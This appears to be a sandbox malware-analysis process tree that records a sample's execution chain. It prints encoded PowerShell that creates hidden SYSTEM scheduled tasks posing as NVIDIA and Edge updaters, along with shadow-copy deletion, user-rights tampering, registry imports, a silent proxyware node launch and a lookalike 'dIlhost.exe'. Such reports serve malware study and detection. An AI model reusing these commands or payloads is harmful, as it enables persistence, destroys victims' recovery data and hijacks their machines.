FAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBOAHYAVABtAFIAZQBwAF8AQwByAGEAcwBoAFIAZQBwAG8AcgB0AF8ARAAyAEUARgAxADgAMwA4ADYAQwA3AEQAQwA0ADYAQwAiACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACwAIAAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAHMAZQB0AHQAaQBuAGcAcwAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAAgAC0AVQBzAGUAcgAgACIAUwBZAFMAVABFAE0AIgAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACAALQBXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgA7AAoAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAiADAAMAA6ADAAMAAiADsACgAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsACgAkAHMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAFMAdABhAHIAdABXAGgAZQBuAEEAdgBhAGkAbABhAGIAbABlACAALQBIAGkAZABkAGUAbgAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgADAAOwAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAVQBBAHsAMAA2ADQAMgA4ADIANwA5AC0ANABCADkAQgAtADQAMwBDAEMALQBEADYARgAyAC0AQgAyAEYAOQA4ADAAQQBDADQANwA0ADAAfQAiACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACwAIAAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAHMAZQB0AHQAaQBuAGcAcwAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAAgAC0AVQBzAGUAcgAgACIAUwBZAFMAVABFAE0AIgAKAA==
        6⤵
        
        PID:5892
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:5968
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoATQBpAGMAcgBvAHMAbwBmAHQALQBXAGkAbgBkAG8AdwBzAC0AUwB1AGIAcwB5AHMAdABlAG0ALQBMAGkAbgB1AHgAIAAvAGEAbABsACAALwBuAG8AcgBlAHMAdABhAHIAdAAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoAVgBpAHIAdAB1AGEAbABNAGEAYwBoAGkAbgBlAFAAbABhAHQAZgBvAHIAbQAgAC8AYQBsAGwAIAAvAG4AbwByAGUAcwB0AGEAcgB0AAoAdwBzAGwAIAAtAC0AcwBlAHQALQBkAGUAZgBhAHUAbAB0AC0AdgBlAHIAcwBpAG8AbgAgADIACgAKACQAcABhAGcAZQBmAGkAbABlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBDAG8AbQBwAHUAdABlAHIAUwB5AHMAdABlAG0AIAAtAEUAbgBhAGIAbABlAEEAbABsAFAAcgBpAHYAaQBsAGUAZwBlAHMACgAkAHAAYQBnAGUAZgBpAGwAZQAuAEEAdQB0AG8AbQBhAHQAaQBjAE0AYQBuAGEAZwBlAGQAUABhAGcAZQBmAGkAbABlACAAPQAgACQAZgBhAGwAcwBlAAoAJABwAGEAZwBlAGYAaQBsAGUALgBwAHUAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAYQBnAGUARgBpAGwAZQBTAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADEANgAzADgANAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAaQBnAGgAUABlAHIAZgBvAHIAbQBhAG4AYwBlAFAAbwB3AGUAcgBQAGwAYQBuAEcAdQBpAGQAIAB7AAoAIAAgACAAIAAkAHAAbwB3AGUAcgBQAGwAYQBuAHMAIAA9ACAAcABvAHcAZQByAGMAZgBnACAALwBsAGkAcwB0ACAAfAAgAFMAZQBsAGUAYwB0AC0AUwB0AHIAaQBuAGcAIAAtAFAAYQB0AHQAZQByAG4AIAAiAEcAVQBJAEQAIgAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABfACAALQBtAGEAdABjAGgAIAAiAC4AKgBcACgAKAAuACoAPwApAFwAKQAuACoAIgApACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwB1AGkAZAAgAD0AIAAkAG0AYQB0AGMAaABlAHMAWwAxAF0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAXwAgAC0AbQBhAHQAYwBoACAAIgAuACoAKABIAGkAZwBoACAAUABlAHIAZgBvAHIAbQBhAG4AYwBlAHwATQDDAKEAeABpAG0AbwAgAEQAZQBzAGUAbQBwAGUAbgBoAG8AfABEAGUAcwBlAG0AcABlAG4AaABvACAATQDDAKEAeABpAG0AbwB8AEEAbAB0AG8AIABEAGUAcwBlAG0AcABlAG4AaABvACkALgAqACIAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABnAHUAaQBkAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkACAAPQAgAEcAZQB0AC0ASABpAGcAaABQAGUAcgBmAG8AcgBtAGEAbgBjAGUAUABvAHcAZQByAFAAbABhAG4ARwB1AGkAZAAKAHAAbwB3AGUAcgBjAGYAZwAgAC8AcwAgACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkAAoACgAkAGcAcgBvAHUAcAAgAD0AIAAiACoAUwAtADEALQAxAC0AMAAiAAoAcwBlAGMAZQBkAGkAdAAgAC8AZQB4AHAAbwByAHQAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwApACAALQByAGUAcABsAGEAYwBlACAAJwBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAuACoAJwAsACAAIgBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAqACQAZwByAG8AdQBwACIAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAHMAZQBjAGUAZABpAHQAIAAvAGMAbwBuAGYAaQBnAHUAcgBlACAALwBkAGIAIABzAGUAYwBlAGQAaQB0AC4AcwBkAGIAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAgAC8AYQByAGUAYQBzACAAVQBTAEUAUgBfAFIASQBHAEgAVABTAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAAoAdgBzAHMAYQBkAG0AaQBuACAAZABlAGwAZQB0AGUAIABzAGgAYQBkAG8AdwBzACAALwBhAGwAbAAgAC8AcQB1AGkAZQB0AAoA
        6⤵
        
        PID:5904
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:6092
        
        C:\Windows\system32\Dism.exe
        
        "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\BD5C2522-F1C7-41A9-93D5-232E75C0E74F\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\BD5C2522-F1C7-41A9-93D5-232E75C0E74F\dismhost.exe {171615D6-3E5B-4B8C-A46C-239C8F9E531D}
        8⤵
        Drops file in Windows directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5872
        
        C:\Windows\system32\Dism.exe
        
        "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
        7⤵
        Drops file in Windows directory
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\F515D68A-AE8A-452C-990C-E0685B38E215\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\F515D68A-AE8A-452C-990C-E0685B38E215\dismhost.exe {F98113A5-4387-4024-8C76-1D8826706807}
        8⤵
        Drops file in Windows directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3704
        
        C:\Windows\system32\wsl.exe
        
        "C:\Windows\system32\wsl.exe" --set-default-version 2
        7⤵
        
        PID:5832
        
        C:\Windows\system32\powercfg.exe
        
        "C:\Windows\system32\powercfg.exe" /list
        7⤵
        Power Settings
        
        PID:5584
        
        C:\Windows\system32\powercfg.exe
        
        "C:\Windows\system32\powercfg.exe" /s
        7⤵
        Power Settings
        
        PID:5708
        
        C:\Windows\system32\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /export /cfg secconfig.cfg
        7⤵
        
        PID:4768
        
        C:\Windows\system32\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db secedit.sdb /cfg secconfig.cfg /areas USER_RIGHTS
        7⤵
        
        PID:3564
        
        C:\Windows\system32\vssadmin.exe
        
        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:6028
  - - C:\Windows\SysWOW64\dxdiag.exe
      "C:\Windows\System32\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
      4⤵
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:1524
  - - C:\Users\Admin\Embedit.exe
      "C:\Users\Admin\Embedit.exe"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Executes dropped EXE
      PID:1164
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3NX80XR.bat" "C:\Users\Admin\Embedit.exe" "
        5⤵
        
        PID:2884
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:6140
      - C:\Windows\system32\reg.exe
        
        reg.exe add "HKCU\SOFTWARE\Microsoft\Installer" /f
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4424
      - C:\Windows\system32\reg.exe
        
        reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products" /f
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3976
      - C:\Windows\system32\reg.exe
        
        reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D" /f
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4524
      - C:\Windows\system32\reg.exe
        
        reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D\SourceList" /f
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5424
      - C:\Windows\system32\reg.exe
        
        reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D\SourceList\Media" /f
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5392
      - C:\Windows\system32\reg.exe
        
        reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D\SourceList\Net" /f
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1428
      - C:\Windows\system32\reg.exe
        
        reg.exe import "C:\Users\Admin\.mysterium-bin\myst.reg"
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:536
      - C:\Windows\system32\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3064
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im myst-launcher-amd64.exe
        6⤵
        Kills process with taskkill
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4824
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im myst.exe
        6⤵
        Kills process with taskkill
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5216
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1476
      - C:\Windows\system32\findstr.exe
        
        findstr /i "myst-launcher-amd64.exe"
        6⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4652
      - C:\Users\Admin\AppData\Local\Temp\myst-launcher-amd64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\myst-launcher-amd64.exe" -autorun
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5376
        
        C:\Users\Admin\.mysterium-bin\myst.exe
        
        C:\Users\Admin\.mysterium-bin\myst.exe --userspace --launcher.ver=1.0.49/windows --config-dir=C:\Users\Admin\.mysterium-node --data-dir=C:\Users\Admin\.mysterium-node --log-dir=C:\Users\Admin\.mysterium-node --node-ui-dir=C:\Users\Admin\.mysterium-node/nodeui service --agreed-terms-and-conditions
        7⤵
        
        PID:1108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption /value
        8⤵
        
        PID:2464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption /value
        8⤵
        
        PID:1008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption /value
        8⤵
        
        PID:2560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption /value
        8⤵
        
        PID:4408
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4424
      - C:\Windows\system32\findstr.exe
        
        findstr /i "myst-launcher-amd64.exe"
        6⤵
        
        PID:1880
      - C:\Windows\system32\timeout.exe
        
        timeout /t 60
        6⤵
        Delays execution with timeout.exe
        
        PID:4816
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:3752
      - C:\Windows\system32\findstr.exe
        
        findstr /i "myst-launcher-amd64.exe"
        6⤵
        
        PID:4912
  - - C:\Users\Admin\AppData\Roaming\GoogleCrashHandler.exe
      "C:\Users\Admin\AppData\Roaming\GoogleCrashHandler.exe"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Executes dropped EXE
      PID:4432
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0PA06OUH.bat" "C:\Users\Admin\AppData\Roaming\GoogleCrashHandler.exe" "
        5⤵
        
        PID:3472
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6140
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:420
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:3976
      - C:\Windows\system32\findstr.exe
        
        findstr /i "dIlhost.exe"
        6⤵
        
        PID:3168
      - C:\Users\Admin\AppData\Local\Temp\dIlhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIlhost.exe"
        6⤵
        
        PID:4400
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:1708
      - C:\Windows\system32\findstr.exe
        
        findstr /i "dIlhost.exe"
        6⤵
        
        PID:5264
      - C:\Users\Admin\AppData\Local\Temp\dIlhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIlhost.exe"
        6⤵
        
        PID:5000
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:4504
      - C:\Windows\system32\findstr.exe
        
        findstr /i "dIlhost.exe"
        6⤵
        
        PID:2436
      - C:\Users\Admin\AppData\Local\Temp\dIlhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIlhost.exe"
        6⤵
        
        PID:4872
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Spyware Terminator\unins000.exe"
      4⤵
      PID:3724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 2508
      4⤵
      Program crash
      PID:5480

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:6000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:5560

C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5336

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:5224

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
PID:5708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffac01dcc40,0x7ffac01dcc4c,0x7ffac01dcc58
  2⤵
  PID:4568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2360,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=1784 /prefetch:2
  2⤵
  PID:1316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=2396 /prefetch:3
  2⤵
  PID:6060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1992,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=2500 /prefetch:8
  2⤵
  PID:6088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:3240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4468,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4576 /prefetch:8
  2⤵
  PID:2272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4408,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4560 /prefetch:8
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2068,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3372 /prefetch:2
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2420,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3392 /prefetch:2
  2⤵
  PID:5936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4040,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
